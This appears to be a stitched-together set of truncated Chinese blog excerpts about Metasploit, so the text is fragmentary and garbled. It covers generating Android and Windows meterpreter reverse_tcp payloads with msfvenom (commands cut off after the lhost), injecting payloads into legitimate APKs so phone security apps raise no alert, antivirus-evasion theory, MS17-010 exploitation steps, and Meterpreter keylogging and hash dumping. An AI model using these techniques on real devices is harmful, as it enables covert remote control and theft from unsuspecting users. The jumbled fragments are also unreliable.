???博主昵称:跳楼梯企鹅????博主主页面链接:https://blog.csdn.net/weixin_50481708?spm=1000.2115.3001.5343?创作初心:本博客的初心为与技术朋友们相互交流,每个人的技术都存在短板,博主也是一样,虚心求教,希望各位技术友给予指导?博主座右铭:发现光,追随光,成为光,散发光?博主研究方向:渗透测试、机器学习?博主寄语:感谢各位技术友的支持,您的支持就是我前进的动力利用MSF工具内网复现MS08-067一、初识MSF1.MSF是什么2.MSF目录结构
一、准备阶段 本实验是在kail里面使用msf工具生成一个Android木马程序,然后客户端进行下载,从而渗透。实验范围为局域网的手机,即入侵的手机要与电脑处于同一个网段,这就需要将虚拟机设置为桥接模式,并手动配置ip。1.查看虚拟机ip此时手机的ip段为192.168.43.0段故需要更改虚拟机ipvim/etc/network/interfaces更改静态ip、网关等重启虚拟机网络配置systemctlrestartnetworking查看ip地址 连通性测试 二、生成Android木马程序1.获取apkmsfvenom-pandroid/meterpreter/reverse_tcplh
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记文章目录前文链接工具地址shielden520apkhookexe加马shellter附加安装软件准备添加后门杀软测试加壳使用杀软测试连接测试apk加马520apkhook加马使用测试连接杀软测试前文链接WAMP/DVWA/sqli-labs搭建burpsuite工具抓包及Intruder暴力破解的使用目录扫描,请求重发,漏洞扫描等工具的使用网站信息收集及nmap的下载使用SQL注入(1)——了解成因和手工注入方法SQL注入(2)——各种注入SQL注入(3)——SQLMAPSQL注入(4)——实战SQL注入拿webshellVulnhub靶
目录前言Metasploit介绍环境准备开始部署官网命令一键安装百度网盘资源安装postgresql数据库部署数据库安装数据库初始化验证问题处理框架升级因执行升级命令,导致工具无法使用前言本文主要介绍 Metasploit渗透测试框架安装部署,可能大家对Metasploit渗透测试框架比较陌生,但是这个框架下有一个很出名的工具:msfconsole,也就是大名鼎鼎的渗透测试工具MSF。这个工具是集成在Kali系统内,但是有的时候我们需要在云服务器上部署这个工具,而云服务器厂商大部分都不提供Kali镜像,所以需要在其他的Linux平台上部署该工具。Metasploit介绍Metasploit是一
介绍由于经典的MSF生成apk安装包控制,版本较低,高版本安卓手机可能会出现版本不支持或无法使用的现象,而且apk无法正常使用,没有图形化界面,比较假。相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。项目地址将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。项目地址: GitHub-ba0gu0/520apkhook:把m
MSF基础学习看这一篇就够了Metasploit常见名词解释MSF简介MSF框架结构MSF配置数据库内网主机发现MSF命令查询常用命令数据库管理命令核心命令模块命令进程命令资源脚本命令后台数据库命令后端凭证命令开发者命令攻击载荷命令MSF模块MSF辅助扫描模块-auxiliaryMSF主机发现MSF服务扫描Telnet服务模块SSH服务模块Oracle数据库扫描SMB服务扫描MSSQL服务扫描FTP、SMTP、SNMP扫描MSF端口扫描WMAPMSF攻击载荷模块Payload类型Stagelesspayload&StagedpayloadPayload生成MSF简介MSF生成Payloadwe
一.杀软原理免杀概念免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。杀毒软件检测方式特征代码法:“同一病毒或同类病毒的某一部分代码相同”的原理来识别病毒文件。该技术是利用留在受感染文件中的病毒特征值进行检测。发现新病毒后,对其进行分析,根据其特征编成病毒码,加入到数据库中。今后在执行查毒程序时,通过对比文件与病毒数据库中的病毒特征码,检查文件是否含有病毒。校验和法:此法计算文件的校验和并保存,可定期或调用文件时进行对比,从而判断文件是否被病毒感染。行为
简介Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。当H.D.Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。1.安装下载链接:https://www.metasploit.com/点击选择相应版本下
1.search漏洞名称或者代号,永恒之蓝的是ms17_010(win10和win11无这个漏洞),exploit攻击利用脚本是进行漏洞攻击,auxiliary辅助是检测漏洞是否存在2.use模块前面的数字或者全称3.查看当前模块的设置,showoptions4.关闭目标机win8的防火墙,ping通kali5.用setRHOSTS目标机ip地址,把win8设置为目标机win8出现的问题:渗透之路暂时终止,等我找到能用的win7镜像再继续在终端sudosu输入密码后写一句话木马:msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=192.168
Meterpreter基本概念Meterpreter是Metasploit框架中的一个扩展模块,在攻击成功以后给我们返回一个控制通道,是metsploit后渗透必不可少的,它具有强大的功能,包括socks代理,端口转发,键盘监听等多个功能,meterpreter可以说是内网渗透测试神器。基本功能(1)系统信息获取(2)密码哈希导出(3)文件上传下载(4)屏幕截取(5)键盘记录(6)权限提升(7)跳板攻击(8)反追踪优点:纯内存工作模式,执行漏洞渗透攻击的时候会直接装载meterpreter的动态链接库到目标进程的空间中,使得meterpreter启动隐蔽,很难被杀毒软件检测到一、后渗透基本操作